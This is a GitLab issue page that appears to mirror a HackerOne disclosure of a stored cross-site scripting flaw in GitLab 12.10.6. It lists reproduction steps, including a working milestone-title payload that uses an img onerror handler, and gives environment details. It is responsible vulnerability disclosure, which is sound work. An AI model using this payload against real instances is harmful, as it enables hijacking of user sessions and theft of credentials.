Skip to content

GitLab Next

  • Projects
  • Groups
  • Snippets
  • Help
    • Loading...
  • Help
    • Help
    • Support
    • Community forum
    • Submit feedback
    • Contribute to GitLab
  • Sign in / Register
GitLab
GitLab
  • Project overview
    • Project overview
    • Details
    • Activity
    • Releases
  • Repository
    • Repository
    • Files
    • Commits
    • Branches
    • Tags
    • Contributors
    • Graph
    • Compare
    • Locked Files
  • Issues 34,827
    • Issues 34,827
    • List
    • Boards
    • Labels
    • Service Desk
    • Milestones
    • Iterations
  • Merge Requests 1,185
    • Merge Requests 1,185
  • Requirements
    • Requirements
    • List
  • CI / CD
    • CI / CD
    • Pipelines
    • Jobs
    • Schedules
    • Test Cases
  • Security & Compliance
    • Security & Compliance
    • Dependency List
    • License Compliance
  • Operations
    • Operations
    • Metrics
    • Incidents
    • Environments
  • Packages & Registries
    • Packages & Registries
    • Container Registry
  • Analytics
    • Analytics
    • CI / CD
    • Code Review
    • Insights
    • Issue
    • Repository
    • Value Stream
  • Snippets
    • Snippets
  • Members
    • Members
  • Collapse sidebar
  • Activity
  • Graph
  • Create a new issue
  • Jobs
  • Commits
  • Issue Boards
  • GitLab.org
  • GitLabGitLab
  • Issues
  • #218448

Closed
Open
Opened May 19, 2020 by GitLab SecurityBot@gitlab-securitybotReporter

Stored XSS in issue pages

HackerOne report #877065 by mike12 on 2020-05-18, assigned to @cmaxim:

Hello Gitlab!

Steps to reproduce

  1. Run Gitlab docker run --detach --hostname gitlab.example.com --publish 443:443 --publish 80:80 --publish 22:22 --name gitlab gitlab/gitlab-ce:latest
  2. Create a new Gitlab project
  3. Go to Issues->Milestones
  4. Create a new milestone with the following title: <img alt="<x" title="/><img src=x onerror=alert(1)>">
  5. Go to Issues->List
  6. Create a new issue with the milestone created in step 4
  7. Collapse the right sidebar 1.png
  8. Hover over the milestone icon

2.png
3.png

My GitLab version

root@gitlab:/# gitlab-rake gitlab:env:info

System information  
System:		  
Current User:	git  
Using RVM:	no  
Ruby Version:	2.6.5p114  
Gem Version:	2.7.10  
Bundler Version:1.17.3  
Rake Version:	12.3.3  
Redis Version:	5.0.7  
Git Version:	2.26.2  
Sidekiq Version:5.2.7  
Go Version:	unknown

GitLab information  
Version:	12.10.6  
Revision:	833223f2a7f  
Directory:	/opt/gitlab/embedded/service/gitlab-rails  
DB Adapter:	PostgreSQL  
DB Version:	11.7  
URL:		http://gitlab.example.com  
HTTP Clone URL:	http://gitlab.example.com/some-group/some-project.git  
SSH Clone URL:	git@gitlab.example.com:some-group/some-project.git  
Using LDAP:	no  
Using Omniauth:	yes  
Omniauth Providers: 

GitLab Shell  
Version:	12.2.0  
Repository storage paths:  
- default: 	/var/opt/gitlab/git-data/repositories  
GitLab Shell path:		/opt/gitlab/embedded/service/gitlab-shell  
Git:		/opt/gitlab/embedded/bin/git  

Impact

An attacker can:

  1. Perform any action within the application that a user can perform
  2. Steal sensitive user data
  3. Steal user's credentials

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

  • 2.png
  • 1.png
  • 3.png
Assignee
Assign to
13.2
Milestone
13.2 (Past due)
Assign milestone
Time tracking
Jul 24, 2020
Due date
Jul 24, 2020
Reference: gitlab-org/gitlab#218448